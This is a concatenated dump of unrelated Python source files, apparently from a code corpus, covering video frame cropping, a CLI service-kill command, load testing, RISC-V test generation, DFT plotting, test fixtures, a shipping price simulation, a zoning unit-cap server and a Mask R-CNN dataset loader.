rand_end = max(0, len(frame_indices) - self.size - 1)
begin_index = random.randint(0, rand_end)
end_index = min(begin_index + self.size, len(frame_indices))
out = frame_indices[begin_index:end_index]
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out
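

# Minimal usage sketch (assumed): crop a clip's frame indices to a fixed length.
#
#     crop = TemporalRandomCrop(16)
#     indices = crop(list(range(1, 91)))  # 16 consecutive indices from a 90-frame clip
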
class TemporalCenterCropFlexible(object):
def __init__(self, begin=15, step=3, end=108):
self.begin = begin
self.step = step
self.end = end
assert (end - begin) / step + 1 == 32
def __call__(self, frame_indices):
out = frame_indices[slice(self.begin, self.end+1, self.step)]
return out
class TemporalCenterRandomCrop(object):
"""Temporally crop the given frame indices at a random location.
If the number of frames is less than the size,
loop the indices as many times as necessary to satisfy the size.
Args:
size (int): Desired output size of the crop.
"""
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
"""
Args:
frame_indices (list): frame indices to be cropped.
Returns:
list: Cropped frame indices.
"""
spacing = int((len(frame_indices) - self.size)/2) # i.e. if 120 and 90: = 30
offset = random.randint(-1*int(spacing/2) + 1, int(spacing/2) - 1) # i.e if 120 and 90, -14 to 14
begin_index = int(len(frame_indices)/2) - int(self.size/2) + offset # i.e. 120: 60 - 45 + offset (-1 to 29)
end_index = begin_index + self.size
out = frame_indices[begin_index:end_index]
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out | 3.28125 | 3 |
cli/waiter/subcommands/kill.py | geofft/waiter | 0 | 4974 | from waiter.action import process_kill_request
from waiter.util import guard_no_cluster, check_positive
def kill(clusters, args, _, __):
"""Kills the service(s) using the given token name."""
guard_no_cluster(clusters)
token_name_or_service_id = args.get('token-or-service-id')
is_service_id = args.get('is-service-id', False)
force_flag = args.get('force', False)
timeout_secs = args['timeout']
success = process_kill_request(clusters, token_name_or_service_id, is_service_id, force_flag, timeout_secs)
return 0 if success else 1
def register(add_parser):
"""Adds this sub-command's parser and returns the action function"""
parser = add_parser('kill', help='kill services')
parser.add_argument('token-or-service-id')
parser.add_argument('--force', '-f', help='kill all services, never prompt', dest='force', action='store_true')
parser.add_argument('--service-id', '-s', help='kill by service id instead of token',
dest='is-service-id', action='store_true')
parser.add_argument('--timeout', '-t', help='timeout (in seconds) for kill to complete',
type=check_positive, default=30)
return kill
| 2.703125 | 3 |
a2t/src/a2t.py | syeda-khurrath/fabric8-analytics-common | 0 | 4975 | <gh_stars>0
"""The main module of the Analytics API Load Tests tool.
Copyright (c) 2019 Red Hat Inc.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import sys
import os
from time import time
from fastlog import log
from csv_reader import read_csv_as_dicts
from setup import setup
from cliargs import cli_parser
from component_analysis import ComponentAnalysis
from stack_analysis import StackAnalysis
from test_runner import start_tests
# current version of this tool
VERSION_MAJOR = 1
VERSION_MINOR = 0
def check_api_endpoint(api):
"""Check that some API endpoint is callable."""
log.info("Checking: core API endpoint")
with log.indent():
if not api.is_api_running():
log.error("Fatal: tested system is not available")
sys.exit(1)
else:
log.success("ok")
def check_auth_token(api):
"""Check the authorization token for the core API."""
log.info("Checking: authorization token for the core API")
with log.indent():
if api.check_auth_token_validity():
log.success("ok")
else:
log.error("Fatal: wrong token(?)")
sys.exit(1)
def check_system(api):
"""Check if all system endpoints are available and that tokens are valid."""
# try to access system endpoints
log.info("System check")
with log.indent():
check_api_endpoint(api)
check_auth_token(api)
def show_version():
"""Show A2T version."""
print("A2T version {major}.{minor}".format(major=VERSION_MAJOR, minor=VERSION_MINOR))
def main():
"""Entry point to the Analytics API Load Tests."""
log.setLevel(log.INFO)
cli_arguments = cli_parser.parse_args()
if cli_arguments.version:
show_version()
sys.exit(0)
else:
cfg = setup(cli_arguments)
coreapi_url = os.environ.get('F8A_SERVER_API_URL', None)
component_analysis = ComponentAnalysis(coreapi_url,
cfg["access_token"], cfg["user_key"], True)
stack_analysis = StackAnalysis(coreapi_url,
cfg["access_token"], cfg["user_key"], True)
check_system(component_analysis)
try:
tests = read_csv_as_dicts(cfg["input_file"])
except Exception as e:
log.error("Test description can not be read")
log.error(e)
sys.exit(0)
t1 = time()
tags = cfg["tags"]
start_tests(cfg, tests, tags, component_analysis, stack_analysis)
t2 = time()
log.info("Start time: {}".format(t1))
log.info("End time: {}".format(t2))
log.info("Duration: {}".format(t2 - t1))
if __name__ == "__main__":
# execute only if run as a script
main()
| 2.046875 | 2 |
riscv_ctg/ctg.py | Giri2801/riscv-ctg | 0 | 4976 | # See LICENSE.incore file for details
import os,re
import multiprocessing as mp
import time
import shutil
from riscv_ctg.log import logger
import riscv_ctg.utils as utils
import riscv_ctg.constants as const
from riscv_isac.cgf_normalize import expand_cgf
from riscv_ctg.generator import Generator
from math import *
from riscv_ctg.__init__ import __version__
def create_test(usage_str, node,label,base_isa,max_inst):
global op_template
global ramdomize
global out_dir
global xlen
flen = 0
if 'opcode' not in node:
return
if 'ignore' in node:
logger.info("Ignoring :" + str(label))
if node['ignore']:
return
for opcode in node['opcode']:
op_node=None
if opcode not in op_template:
for op,foo in op_template.items():
if op!='metadata' and foo['std_op'] is not None and opcode==foo['std_op']:
op_node = foo
break
else:
op_node = op_template[opcode]
if op_node is None:
logger.warning("Skipping :" + str(opcode))
return
if xlen not in op_node['xlen']:
logger.warning("Skipping {0} since its not supported in current XLEN:".format(opcode))
return
if 'flen' in op_node:
if '.d' in opcode:
flen = 64
elif '.s' in opcode:
flen = 32
else:
flen = op_node['flen'][0]
#if flen not in op_node['flen']:
# return
fprefix = os.path.join(out_dir,str(label))
logger.info('Generating Test for :' + str(label) +"-" + opcode)
formattype = op_node['formattype']
gen = Generator(formattype,op_node,opcode,randomize,xlen,flen,base_isa)
op_comb = gen.opcomb(node)
val_comb = gen.valcomb(node)
instr_dict = gen.correct_val(gen.testreg(gen.swreg(gen.gen_inst(op_comb, val_comb, node))))
logger.info("Writing tests for :"+str(label))
my_dict = gen.reformat_instr(instr_dict)
gen.write_test(fprefix,node,label,my_dict, op_node, usage_str, max_inst)
def ctg(verbose, out, random ,xlen_arg, cgf_file,num_procs,base_isa, max_inst,list_duplicate):
global op_template
global randomize
global out_dir
global xlen
logger.level(verbose)
logger.info('****** RISC-V Compliance Test Generator {0} *******'.format(__version__ ))
logger.info('Copyright (c) 2020, InCore Semiconductors Pvt. Ltd.')
logger.info('All Rights Reserved.')
logger.info("Copying env folder to Output directory.")
env_dir = os.path.join(out,"env")
if not os.path.exists(env_dir):
shutil.copytree(const.env,env_dir)
xlen = int(xlen_arg)
out_dir = out
randomize = random
mytime = time.asctime(time.gmtime(time.time()) ) + ' GMT'
cgf_argument = ''
for cf in cgf_file:
cgf_argument += '// --cgf {} \\\n'.format(cf)
randomize_argument = ''
if random is True:
randomize_argument = ' \\\n// --randomize'
usage_str = const.usage.safe_substitute(base_isa=base_isa, \
cgf=cgf_argument, version = __version__, time=mytime, \
randomize=randomize_argument,xlen=str(xlen_arg))
op_template = utils.load_yaml(const.template_file)
cgf = expand_cgf(cgf_file,xlen,list_duplicate)
pool = mp.Pool(num_procs)
results = pool.starmap(create_test, [(usage_str, node,label,base_isa,max_inst) for label,node in cgf.items()])
pool.close()
| 1.898438 | 2 |
Back-End/Python/timers/clock_named_tuple.py | ASHISHKUMAR2411/Programming-CookBook | 25 | 4977 | <filename>Back-End/Python/timers/clock_named_tuple.py
from collections import namedtuple
MainTimer = namedtuple('MainTimer', 'new_time_joined, end_period, new_weekday, days')
def add_time(start, duration, start_weekday=None):
weekdays = [
'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday',
'Saturday', 'Sunday'
]
start_time, period = start.split(' ')
def process_time():
current_hour, current_minute = ([int(t) for t in start_time.split(':')])
end_hour, end_minute = ([int(d) for d in duration.split(':')])
# Adds Current time plus End Time Total
        end_hours, end_mins = (current_hour + end_hour, current_minute + end_minute)
        # Carry overflowing minutes into the hour count
        end_hours += end_mins // 60
        end_mins %= 60
        # Calculates Total days passed
        days = end_hours // 24
        # Calculates New Time (a 12-hour clock shows 12 rather than 0)
        new_time_array = [str(end_hours % 12 or 12), ':', str(end_mins).rjust(2, '0')]
        new_time_joined = ''.join(new_time_array)
end_period = [period]
        # Number of 12-hour periods elapsed, used to toggle AM/PM
clock = end_hours // 12
if start_weekday:
start_day_idx = weekdays.index(start_weekday.title())
new_weekday = weekdays[(start_day_idx + days % 7) % 7]
else:
new_weekday = False
# Figure out whether is AM or PM
for i in range(clock):
if end_period[-1].lower() == 'am':
end_period.append('PM')
else:
end_period.append('AM')
return MainTimer(new_time_joined, end_period, new_weekday, days)
# Triggers process time function
timed = process_time()
def process_output():
new_time = f'New Time is >>> {timed.new_time_joined} {timed.end_period[-1]}'
if timed.new_weekday:
new_time += f'- {timed.new_weekday} -'
        if timed.days == 1 and (period != timed.end_period[-1] or timed.end_period[-1] == 'AM'):
new_time += ' (new_day)'
elif timed.days > 1:
new_time += f' -Total days: {timed.days}- <<'
return new_time
new_time = process_output()
return new_time
print('---'*30)
x = add_time('10:00 AM', '54:00', 'Monday')
print(x)
print('---'*30) | 3.25 | 3 |
mlsurvey/visualize/__init__.py | jlaumonier/mlsurvey | 0 | 4978 | from .analyze_logs import AnalyzeLogs
from .search_interface import SearchInterface
from .detail_interface import DetailInterface
from .user_interface import UserInterface
from .visualize_log_detail import VisualizeLogDetail
| 1.039063 | 1 |
stanford/sms-tools/lectures/02-DFT/plots-code/idft.py | phunc20/dsp | 1 | 4979 | import matplotlib.pyplot as plt
import numpy as np
import sys
sys.path.append('../../../software/models/')
import dftModel as DFT
import math
k0 = 8.5
N = 64
w = np.ones(N)
x = np.cos(2*np.pi*k0/N*np.arange(-N/2,N/2))
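# k0 = 8.5 lies between DFT bins, so the magnitude spectrum below exhibits
# spectral leakage (energy spread across bins) rather than a single sharp peak.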
mX, pX = DFT.dftAnal(x, w, N)
y = DFT.dftSynth(mX, pX, N)
plt.figure(1, figsize=(9.5, 5))
plt.subplot(311)
plt.title('positive freq. magnitude spectrum in dB: mX')
plt.plot(np.arange(mX.size), mX, 'r', lw=1.5)
plt.axis([0,mX.size, min(mX), max(mX)+1])
plt.subplot(312)
plt.title('positive freq. phase spectrum: pX')
plt.plot(np.arange(pX.size), pX, 'c', lw=1.5)
plt.axis([0, pX.size,-np.pi,np.pi])
plt.subplot(313)
plt.title('inverse spectrum: IDFT(X)')
plt.plot(np.arange(-N/2, N/2), y,'b', lw=1.5)
plt.axis([-N/2,N/2-1,min(y), max(y)])
plt.tight_layout()
plt.savefig('idft.png')
plt.show()
| 2.25 | 2 |
setup.py | jerzydziewierz/typobs | 0 | 4980 | <gh_stars>0
# setup.py as described in:
# https://stackoverflow.com/questions/27494758/how-do-i-make-a-python-script-executable
# to install on your system, run:
# > pip install -e .
from setuptools import setup, find_packages
setup(
name='typobs',
version='0.0.3',
entry_points={
'console_scripts': [
'to_obsidian=to_obsidian:run',
'to_typora=to_typora:run',
]
},
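    # After `pip install -e .` (see above), these entry points should expose two
    # console commands, `to_obsidian` and `to_typora`, each calling the run()
    # function of the corresponding module.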
packages=find_packages(),
# metadata to display on PyPI
author="<NAME>",
author_email="<EMAIL>",
description="Convert between Typora and Obsidian link styles",
keywords="Typora Obsidian Markdown link converter",
url="https://github.com/jerzydziewierz/typobs", # project home page, if any
project_urls={
"Bug Tracker": "https://github.com/jerzydziewierz/typobs",
"Documentation": "https://github.com/jerzydziewierz/typobs",
"Source Code": "https://github.com/jerzydziewierz/typobs",
},
classifiers=[
"Programming Language :: Python",
"Topic :: Documentation",
"Topic :: Software Development :: Documentation",
"Topic :: Office/Business",
"Topic :: Text Processing :: Filters",
"Topic :: Text Processing :: Markup",
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"License :: OSI Approved :: Apache Software License",
]
) | 1.953125 | 2 |
tests/fixtures.py | ehelms/system-baseline-backend | 0 | 4981 | """
decoded AUTH_HEADER (newlines added for readability):
{
"identity": {
"account_number": "1234",
"internal": {
"org_id": "5678"
},
"type": "User",
"user": {
"email": "<EMAIL>",
"first_name": "Firstname",
"is_active": true,
"is_internal": true,
"is_org_admin": false,
"last_name": "Lastname",
"locale": "en_US",
"username": "test_username"
}
}
"entitlements": {
"smart_management": {
"is_entitled": true
}
}
}
"""
AUTH_HEADER = {
"X-RH-IDENTITY": "<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>
}
AUTH_HEADER_NO_ENTITLEMENTS = {
"X-RH-IDENTITY": "<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>
}
AUTH_HEADER_SMART_MGMT_FALSE = {
"X-RH-IDENTITY": "<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"c19vcmdfYWRtaW<KEY>lLCJsYXN0X25hbWUi"
"<KEY>"
"<KEY>l"
"bnRpdGxlbWVudHMiOnsic21hcnRfbWFuYWdlbWVu"
"dCI6eyJpc19lbnRpdGxlZCI6IGZhbHNlfX19Cg=="
}
# this can't happen in real life, adding test anyway
AUTH_HEADER_NO_ACCT_BUT_HAS_ENTS = {
"X-RH-IDENTITY": "<KEY>f"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"YWdlbWVudCI6eyJpc19lbnRpdGxlZCI6IHRydWV9"
"fX0K"
}
"""
decoded AUTH_HEADER_NO_ACCT (newlines added for readablity):
{
"identity": {
"internal": {
"org_id": "9999"
},
"type": "User",
"user": {
"email": "<EMAIL>",
"first_name": "No",
"is_active": true,
"is_internal": true,
"is_org_admin": false,
"last_name": "Number",
"locale": "en_US",
"username": "nonumber"
}
}
}
"""
AUTH_HEADER_NO_ACCT = {
"X-RH-IDENTITY": "<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>
}
BASELINE_ONE_LOAD = {
"baseline_facts": [
{"name": "arch", "value": "x86_64"},
{"name": "phony.arch.fact", "value": "some value"},
],
"display_name": "arch baseline",
}
BASELINE_TWO_LOAD = {
"baseline_facts": [
{"name": "memory", "value": "64GB"},
{"name": "cpu_sockets", "value": "16"},
],
"display_name": "cpu + mem baseline",
}
BASELINE_THREE_LOAD = {
"baseline_facts": [
{"name": "nested", "values": [{"name": "cpu_sockets", "value": "16"}]}
],
"display_name": "cpu + mem baseline",
}
BASELINE_PARTIAL_ONE = {"baseline_facts": [{"name": "hello", "value": "world"}]}
BASELINE_PARTIAL_TWO = {
"display_name": "ABCDE",
"baseline_facts": [
{
"name": "hello",
"values": [
{"name": "nested_one", "value": "one"},
{"name": "nested_two", "value": "two"},
],
}
],
}
BASELINE_PARTIAL_CONFLICT = {"display_name": "arch baseline"}
CREATE_FROM_INVENTORY = {
"display_name": "created_from_inventory",
"inventory_uuid": "df925152-c45d-11e9-a1f0-c85b761454fa",
}
SYSTEM_WITH_PROFILE = {
"account": "9876543",
"bios_uuid": "e380fd4a-28ae-11e9-974c-c85b761454fb",
"created": "2018-01-31T13:00:00.100010Z",
"display_name": None,
"fqdn": None,
"id": "bbbbbbbb-28ae-11e9-afd9-c85b761454fa",
"insights_id": "00000000-28af-11e9-9ab0-c85b761454fa",
"ip_addresses": ["10.0.0.3", "fc00:db20:35b:7399::5"],
"mac_addresses": ["52:54:00:cd:ae:00", "00:00:00:00:00:00"],
"rhel_machine_id": None,
"satellite_id": None,
"subscription_manager_id": "RHN Classic and Red Hat Subscription Management",
"system_profile": {
"salutation": "hi",
"system_profile_exists": False,
"installed_packages": [
"openssl-1.1.1c-2.fc30.x86_64",
"python2-libs-2.7.16-2.fc30.x86_64",
],
"id": "bbbbbbbb-28ae-11e9-afd9-c85b761454fa",
},
"tags": [],
"updated": "2018-01-31T14:00:00.500000Z",
}
| 1.921875 | 2 |
2021-02-03/2.py | Elfenreigen/MCM-2021-C-SJTU-Test | 1 | 4982 | <reponame>Elfenreigen/MCM-2021-C-SJTU-Test
#####Time Flow Simulation######
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from datetime import timedelta
import datetime
import csv
data=pd.read_excel('CF66-all.xlsx')
data.sort_values(by=['WBL_AUD_DT'],ascending=True,inplace=True)
or_data=pd.read_excel('CF66-ordinary.xlsx')
rule=pd.read_excel('6. Existing pricing strategy.xlsx')
or_name=or_data['WBL_NUM'].unique()
data['ordinary']=0
for i in range(len(data)):
if data.iloc[i,2] in or_name:
data.iloc[i,9]=1
data['volume']=data['CNTR_TYPE']
for i in range(len(data)):
data.iloc[i,10]=int(data.iloc[i,10][0:2])
raw_data=data.groupby('SVVD')
data_to_list=list(raw_data)
raw_list=[]
for i in data_to_list:
raw_list.append(i[1])
total_volume=raw_data['volume'].sum()*1.2
thisrule=rule.groupby(['装港','卸港']).get_group(('营口','海口'))
group_rule=thisrule.groupby(['开始天数','结束天数'])
rule_to_list=list(group_rule)
day_list=[]
rule_list=[]
for i in rule_to_list:
day_list.append(i[0])
rule_list.append(i[1])
m=datetime.timedelta(days=14)
newlist=[]
for i in raw_list:
i['WBL_AUD_DT']=pd.to_datetime(i['WBL_AUD_DT'])
m=datetime.timedelta(days=14)
j=i[i['WBL_AUD_DT']>=i['WBL_AUD_DT'].max()-m]
newlist.append(j)
del(raw_list)
for i in newlist:
i['acc_volume']=i['volume'].cumsum()
i['total_volume']=i['volume'].sum()*1.2
m=datetime.timedelta(days=14)
i['day']=(i['WBL_AUD_DT']-i['WBL_AUD_DT'].max()+m).dt.days
i['acc_rate']=i['acc_volume']/i['total_volume']*100
i['new_AMT']=i['AMT']
for k in range(len(newlist)):
acc_20gp=0
acc_40gp=0
acc_40hq=0
print('k='+str(k))
for i in range(len(day_list)):
print('i='+str(i))
first_day=day_list[i][0]
last_day=day_list[i][1]
flag=[0]*len(rule_list[i])
for j in range(len(newlist[k])):
if newlist[k].iloc[j]['day']>=first_day and newlist[k].iloc[j]['day']<last_day and newlist[k].iloc[j]['ordinary']==1:
for z in range(len(rule_list[i])):
print('z='+str(z))
if newlist[k].iloc[j]['acc_rate']>rule_list[i].iloc[z]['舱位利用率阈值']and rule_list[i].iloc[z]['涨价/降价']=='涨价':
if flag[z]==0:
flag[z]=1
acc_20gp+=rule_list[i].iloc[z]['20GP']
acc_40gp+=rule_list[i].iloc[z]['40GP']
acc_40hq+=rule_list[i].iloc[z]['40HQ']
if newlist[k].iloc[j]['acc_rate']<rule_list[i].iloc[z]['舱位利用率阈值']and rule_list[i].iloc[z]['涨价/降价']=='降价':
if flag[z]==0:
flag[z]=1
acc_20gp-=rule_list[i].iloc[z]['20GP']
acc_40gp-=rule_list[i].iloc[z]['40GP']
acc_40hq-=rule_list[i].iloc[z]['40HQ']
print(flag)
print(acc_20gp)
print(acc_40gp)
print(acc_40hq)
if newlist[k].iloc[j]['CNTR_TYPE']=='20GP':
newlist[k].iloc[j,15]+=acc_20gp
if newlist[k].iloc[j]['CNTR_TYPE']=='40GP':
newlist[k].iloc[j,15]+=acc_40gp
if newlist[k].iloc[j]['CNTR_TYPE']=='40HQ':
newlist[k].iloc[j,15]+=acc_40hq
for i in newlist:
print('revenue:'+str(i['AMT'].sum()))
print('newrevenue:'+str(i['new_AMT'].sum()))
newlist[0].to_csv('voyage1.csv')
newlist[1].to_csv('voyage2.csv')
newlist[2].to_csv('voyage3.csv')
| 2.296875 | 2 |
tests/test_selection.py | qrebjock/fanok | 0 | 4983 | import pytest
import numpy as np
from fanok.selection import adaptive_significance_threshold
@pytest.mark.parametrize(
"w, q, offset, expected",
[
([1, 2, 3, 4, 5], 0.1, 0, 1),
([-1, 2, -3, 4, 5], 0.1, 0, 4),
([-3, -2, -1, 0, 1, 2, 3], 0.1, 0, np.inf),
([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.1, 0, 4),
([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.15, 0, 3),
(
[-1.52, 1.93, -0.76, -0.35, 1.21, -0.39, 0.08, -1.45, 0.31, -1.38],
0.1,
0,
1.93,
),
],
)
def test_adaptive_significance_threshold(w, q, offset, expected):
w = np.array(w)
threshold = adaptive_significance_threshold(w, q, offset=offset)
assert threshold == expected
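# Reference formula (an assumption for illustration, not fanok's actual code):
# the expectations above are consistent with the standard knockoff/knockoff+
# threshold  min{ t > 0 : (offset + #{w_j <= -t}) / max(1, #{w_j >= t}) <= q },
# with np.inf returned when no candidate qualifies. A minimal sketch:
def _reference_threshold(w, q, offset=0):
    w = np.asarray(w, dtype=float)
    # Candidate thresholds are the distinct non-zero magnitudes of w
    candidates = np.sort(np.unique(np.abs(w[w != 0])))
    for t in candidates:
        fdp_estimate = (offset + np.sum(w <= -t)) / max(1, np.sum(w >= t))
        if fdp_estimate <= q:
            return t
    return np.inf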
| 2.5625 | 3 |
unitcap/unit_cap.py | fintelia/habitationi | 1 | 4984 | <reponame>fintelia/habitationi
#!/usr/bin/python
# Copyright 2019 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from urlparse import urlparse, parse_qs
from jinja2 import Template
import sqlite3
import urllib
def get_caps(options):
far = {}
for i in ['A-1', 'A-2', 'B', 'SD-2']:
far[i] = 0.5
for i in ['C', 'SD-9', 'SD-10F', 'SD-10H']:
far[i] = 0.6
for i in ['C-1', 'BA-3', 'IB-2', 'O-1']:
far[i] = .75
for i in ['BA-1', 'SD-12']:
far[i] = 1.0
for i in ['C-1A', 'SD-5']:
far[i] = 1.25
for i in ['IA-1', 'IA', 'O-2A', 'SD-4A', 'SD-13']:
far[i] = 1.5
for i in ['C-2', 'C-2B', 'BA', 'BA-2', 'SD-8']:
far[i] = 1.75
for i in ['BC', 'O-2']:
far[i] = 2.0
for i in ['C-2A']:
far[i] = 2.50
for i in ['C-3', 'C-3A', 'C-3B', 'BB', 'BB-2', 'BC-1', 'IB-1', 'O-3', 'O-3A', 'SD-1', 'SD-6', 'SD-7']:
far[i] = 3.0
for i in ['IA-2', 'IB']:
far[i] = 4.0
far['BB-1'] = 3.25
far['SD-11'] = 1.7
far['SD-15'] = 3.5
lot_area = {
'A-1': 6000,
'A-2': 4500,
'C-1A': 1000,
'BC': 500,
'BC-1': 450,
'IA-1': 700,
'SD-8': 650,
'SD-14': 800,
}
for i in ['IB-2', 'BA-1']:
lot_area[i] = 1200
for i in ['B', 'SD-2', 'SD-3']:
lot_area[i] = 2500
for i in ['C', 'SD-10F', 'SD-10H', 'SD-9']:
lot_area[i] = 1800
for i in ['C-1', 'BA-3']:
lot_area[i] = 1500
for i in ['C-2', 'C-2B', 'O-2', 'BA', 'BA-2', 'SD-4', 'SD-4A', 'SD-5', 'SD-11', 'SD-13']:
lot_area[i] = 600
for i in ['C-2A', 'C-3', 'C-3A', 'C-3B', 'BB', 'BB-1', 'BB-2', 'SD-1', 'SD-6', 'SD-7']:
lot_area[i] = 300
for i in lot_area:
if options and 'lot_explicit' in options:
lot_area[i] = options['lot_explicit']
elif options and 'lot_factor' in options:
lot_area[i] = int(lot_area[i] / float(options['lot_factor']))
if 'no_lot' in options:
lot_area = {}
for i in far:
if options and 'far_explicit' in options:
far[i] = options['far_explicit']
elif options and 'far_factor' in options:
far[i] = far[i] * float(options['far_factor'])
if 'no_far' in options:
far = {}
return far, lot_area
def table(options):
far, lot_area = get_caps(options)
table = []
for i in ['A-1', 'A-2', 'B', 'C', 'C-1', 'C-1A', 'C-2', 'C-2A', 'C-2B', 'C-3', 'C-3A', 'C-3B']:
table.append("<tr><td>%s</td><td>%s</td><td>%s</td></tr>" % (i, far.get(i, ""), lot_area.get(i,"")))
return "\n".join(table)
def unit_cap(row, options=None):
if not options:
options = {}
far, lot_area = get_caps(options)
zone = row['zone']
if (not zone.startswith("C") and not zone in ("A-1", "A-2", "B")) or zone == "CRDD":
return -1
if zone in ['A-1', 'A-2'] and not 'no_a' in options:
return 1
#print row
area = float(row.get('gis_lot_size',0) or 0)
if zone in lot_area and area:
m = max(area/(lot_area[zone]), 1)
else:
m = 100000
max_building = area * far[zone] * 1
if max(int(max_building/800), 1) < m:
m = max(int(max_building/800), 1)
if zone == "B" and not 'no_b' in options:
m = min(m, 2)
return m
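# A hypothetical example call (values chosen for illustration): a C-1 lot with a
# gis_lot_size of 6000 has FAR 0.75 and a 1500 lot-area-per-unit minimum under the
# default caps above, so it should cap out at 4 units:
#
#   unit_cap({'zone': 'C-1', 'gis_lot_size': 6000})   # -> 4.0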
def dict_factory(cursor, row):
d = {}
for idx, col in enumerate(cursor.description):
d[col[0]] = row[idx]
return d
def compute_count(options = None):
conn = sqlite3.connect("prop.db")
if options == None:
options = {}
c = conn.cursor()
c.row_factory = dict_factory
m = 0
current = 0
for row in c.execute("SELECT * FROM lots"):
t = unit_cap(row, options=options)
if t == -1:
continue
m += int(t)
return m
def describe(options):
changes = []
if 'no_lot' in options:
changes.append("eliminate lot size/unit minimums")
elif 'lot_explicit' in options:
changes.append("set all lot size/unit minimums to %s" % options['lot_explicit'])
elif 'lot_factor' in options and options['lot_factor'] != 1.0:
changes.append('decrease lot size minimums by a factor of %s' % options['lot_factor'])
if 'no_a' in options:
changes.append('eliminate single family zoning in A-1 and A-2 zones')
if 'no_b' in options:
changes.append('eliminate two-family zoning limits in B zones')
if 'far_explicit' in options:
changes.append("set all FAR maximums to %s" % options['far_explicit'])
elif 'far_factor' in options and options['far_factor'] != 1.0:
changes.append('increase FAR maximums by a factor of %s' % options['far_factor'])
if len(changes):
return ", ".join(changes)
else:
return ""
def serve(options):
d = open("unit_template.html")
template = Template( d.read() )
unit_count = int(compute_count(options))
data = {}
data['changes'] = describe(options)
data['unit_count'] = unit_count
data['increase'] = unit_count-37453
data['table'] = table(options)
data['options'] = options
s = template.render(**data)
return s
PORT_NUMBER = 8080
class myHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-type','text/html')
self.end_headers()
# Send the html message
form = parse_qs(urlparse(self.path).query)
options = {}
for i in ['far_factor', 'lot_factor']:
if i in form:
options[i] = float(form[i][0])
else:
options[i] = 1.0
if 'far_explicit' in form and form['far_explicit']:
options['far_explicit'] = float(form['far_explicit'][0])
if 'lot_explicit' in form and form['lot_explicit']:
options['lot_explicit'] = int(form['lot_explicit'][0])
if 'lot' in form:
options['no_lot'] = True
if 'singlefamily' in form:
options['no_a'] = True
if 'twofamily' in form:
options['no_b'] = True
self.wfile.write(serve(options))
return
def run():
try:
#Create a web server and define the handler to manage the
#incoming request
server = HTTPServer(('', PORT_NUMBER), myHandler)
print 'Started httpserver on port ' , PORT_NUMBER
    #Wait forever for incoming http requests
server.serve_forever()
except KeyboardInterrupt:
print '^C received, shutting down the web server'
server.socket.close()
if __name__ == "__main__":
print run()
| 2.21875 | 2 |
matrix/__init__.py | AbhiK002/Matrix | 2 | 4985 | <filename>matrix/__init__.py
from .main import Matrix
| 0.949219 | 1 |
samples/cmk/test.py | jasstionzyf/Mask_RCNN | 0 | 4986 | <filename>samples/cmk/test.py
import os
import sys
import json
import datetime
import numpy as np
import glob
import skimage
from PIL import Image as pil_image
import cv2
def locationToMask(locations=None,height=None,width=None):
mask = np.zeros([height, width, len(locations)],
dtype=np.uint8)
for index,location in enumerate(locations):
x1, y1, x2, y2 = location
mask[y1:y2+1,x1:x2+1,index]=1
print(mask[:,:,index])
    return mask.astype(bool), np.ones([mask.shape[-1]], dtype=np.int32)
def load_cmk(dataset_dir, subset):
folder=os.path.join(dataset_dir, subset)
imagesPattern=folder+'/*.jpg'
for image_path in glob.glob(imagesPattern):
print(image_path)
img = cv2.imread(image_path)
height,width = img.shape[:2]
imageId=os.path.basename(image_path).replace('.jpg','')
print(imageId)
#
# self.add_image(
# "balloon",
# image_id=a['filename'], # use file name as a unique image id
# path=image_path,
# width=width, height=height,
# polygons=polygons)
locationsFile='%s/%s.txt' % (folder,imageId)
locations=[]
with open(locationsFile) as fp:
lines = fp.readlines()
for line in lines:
line = line.replace('\n', '')
if len(line.split(' ')) < 5:
break
classIndex, xcen, ycen, w, h = line.strip().split(' ')
xmin = max(float(xcen) - float(w) / 2, 0)
xmax = min(float(xcen) + float(w) / 2, 1)
ymin = max(float(ycen) - float(h) / 2, 0)
ymax = min(float(ycen) + float(h) / 2, 1)
xmin = int(width * xmin)
xmax = int(width * xmax)
ymin = int(height * ymin)
ymax = int(height * ymax)
location=(xmin,ymin,xmax,ymax)
locations.append(location)
print(locations)
dataset_dir='/Volumes/v2/data/mlib_data/dataset/cmk/images_v2/'
subset='val'
load_cmk(dataset_dir=dataset_dir,subset=subset)
locations=[(2,3,5,7),(8,8,9,9)]
height=10
width=10
# mask,classIds=locationToMask(locations=locations,height=height,width=width)
# print(mask)
# print(classIds)
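# Quick sanity check (a sketch): for the sample boxes above the mask tensor
# should have shape (height, width, len(locations)) with one class id per box.
mask, classIds = locationToMask(locations=locations, height=height, width=width)
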